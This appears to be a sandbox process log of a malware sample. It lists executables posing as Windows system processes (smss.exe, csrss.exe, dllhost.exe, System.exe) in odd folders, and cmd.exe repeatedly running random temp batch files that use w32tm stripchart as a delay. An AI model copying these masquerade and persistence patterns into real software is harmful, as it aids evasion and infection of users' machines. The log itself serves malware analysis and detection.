
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\Idle.exe

"C:\Users\Default User\Idle.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\fg7ffKrc0I.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\System.exe

"C:\Users\Default User\System.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\QOz0umrEhM.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\Idle.exe

"C:\Users\Default User\Idle.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\8Usvo58uhQ.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\System.exe

"C:\Users\Default User\System.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\NczlPfxoCy.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\Idle.exe

"C:\Users\Default User\Idle.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\fBgHK1Vy37.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\System.exe

"C:\Users\Default User\System.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\wLA3izB53h.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\Idle.exe

"C:\Users\Default User\Idle.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\AvSbArq942.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\System.exe

"C:\Users\Default User\System.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\9dhy3B39XM.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\Idle.exe

"C:\Users\Default User\Idle.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\lZfwAG7KGX.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\System.exe

"C:\Users\Default User\System.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\BikqvEHWfW.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\Idle.exe

"C:\Users\Default User\Idle.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\evbbIz777a.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\System.exe

"C:\Users\Default User\System.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\cYhs0sn2L6.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\Idle.exe

"C:\Users\Default User\Idle.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\UMVEid32eq.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\System.exe

"C:\Users\Default User\System.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\WqeaogqjWu.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\Idle.exe

"C:\Users\Default User\Idle.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\eQ9EwglUAP.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\System.exe

"C:\Users\Default User\System.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\8Usvo58uhQ.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\Idle.exe

"C:\Users\Default User\Idle.exe"

C:\Users\Default User\System.exe

"C:\Users\Default User\System.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Zi7wkUpBKE.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\xHU7fKnwSZ.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\System.exe

"C:\Users\Default User\System.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\VG36Hwy0Lv.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\Idle.exe

"C:\Users\Default User\Idle.exe"

C:\Users\Default User\System.exe

"C:\Users\Default User\System.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\WtKWrLEt72.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\System.exe

"C:\Users\Default User\System.exe"

C:\Users\Default User\System.exe

"C:\Users\Default User\System.exe"

C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe

"C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\rd8mWnFnEV.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe

"C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\QLJ4q7S46F.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe

"C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\2tBWjDxv5U.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe

"C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\IrGY9odMle.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe

"C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\wRWwqJyPGw.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe

"C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\ATZuYpZxcK.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe

"C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\LabqbH8bfv.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe

"C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\ZcfpJnj91J.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe

"C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\9EVEWoB6gn.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe

"C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\LEBHQwxRW8.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe

"C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe"

C:\Program Files (x86)\Windows Defender\es-ES\cmd.exe

"C:\Program Files (x86)\Windows Defender\es-ES\cmd.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\dFeEewS5jL.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\gMBHdlpNUB.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe

"C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\TZCyxGcg3L.bat"

C:\Program Files (x86)\Windows Defender\es-ES\cmd.exe

"C:\Program Files (x86)\Windows Defender\es-ES\cmd.exe"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\yMeEqlK1gO.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe

"C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\kXH0MsH7jV.bat"

C:\Program Files (x86)\Windows Defender\es-ES\cmd.exe

"C:\Program Files (x86)\Windows Defender\es-ES\cmd.exe"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\CPhDZIwY3l.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe

"C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe"

C:\Program Files (x86)\Windows Defender\es-ES\cmd.exe

"C:\Program Files (x86)\Windows Defender\es-ES\cmd.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\N7XO3McAFn.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\uq0hdwOOBc.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe

"C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\uugdhbmYnk.bat"

C:\Program Files (x86)\Windows Defender\es-ES\cmd.exe

"C:\Program Files (x86)\Windows Defender\es-ES\cmd.exe"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Dk8ljd7jBY.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe

"C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\v65NgynF79.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Program Files (x86)\Windows Defender\es-ES\cmd.exe

"C:\Program Files (x86)\Windows Defender\es-ES\cmd.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\79RMekxjZd.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe

"C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\ZgKlNS7JdR.bat"

C:\Program Files (x86)\Windows Defender\es-ES\cmd.exe

"C:\Program Files (x86)\Windows Defender\es-ES\cmd.exe"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\SzaURWjxsM.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe

"C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\H7eFR6a9mI.bat"

C:\Program Files (x86)\Windows Defender\es-ES\cmd.exe

"C:\Program Files (x86)\Windows Defender\es-ES\cmd.exe"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\8Usvo58uhQ.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe

"C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\CWxqMEPA9M.bat"

C:\Program Files (x86)\Windows Defender\es-ES\cmd.exe

"C:\Program Files (x86)\Windows Defender\es-ES\cmd.exe"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\QOz0umrEhM.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe

"C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe"

C:\Program Files (x86)\Windows Defender\es-ES\cmd.exe

"C:\Program Files (x86)\Windows Defender\es-ES\cmd.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\15yWIDpGaf.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\iPSx7mMsuZ.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Admin\csrss.exe

C:\Users\Admin\csrss.exe

C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe

"C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\zAqEIlSfAD.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Program Files (x86)\Windows Defender\es-ES\cmd.exe

"C:\Program Files (x86)\Windows Defender\es-ES\cmd.exe"

C:\Users\Admin\csrss.exe

"C:\Users\Admin\csrss.exe"

C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe

C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\WtKWrLEt72.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe

"C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\3gUlVaPHfz.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe

"C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\LabqbH8bfv.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe

"C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\eUivgxqvfs.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe

"C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\ZmgdUlucqh.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe

"C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\ixgWq8OOYW.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe

"C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\aJcBxrOCPY.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe

"C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\53OVnhiNRT.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe

"C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\wNwF62sylT.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe

"C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\T3kbcxG26A.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe

"C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\0quqFCQQe7.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe

"C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\ssDSZpddA3.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe

"C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\4stVUxPy0P.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe

"C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\E3sOpJujjE.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe

"C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\SzaURWjxsM.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe

"C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\GTS4B5cy6p.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe

"C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\p5ITN63wlJ.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe

"C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\wKGJ2NUoAL.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe

"C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\8KwMxVG80h.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe

"C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\OI2OM6vZgr.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe

"C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\j8BV8simza.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\Idle.exe

"C:\Users\Default User\Idle.exe"

C:\Users\Default User\sppsvc.exe

"C:\Users\Default User\sppsvc.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\z7AIE64VZ5.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe

"C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe"

C:\Users\Default User\sppsvc.exe

"C:\Users\Default User\sppsvc.exe"

C:\Users\Default User\System.exe

"C:\Users\Default User\System.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\ounU5LkXKE.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\System.exe

"C:\Users\Default User\System.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\5mXdMdden9.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\System.exe

"C:\Users\Default User\System.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\x8TIUMdSeB.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

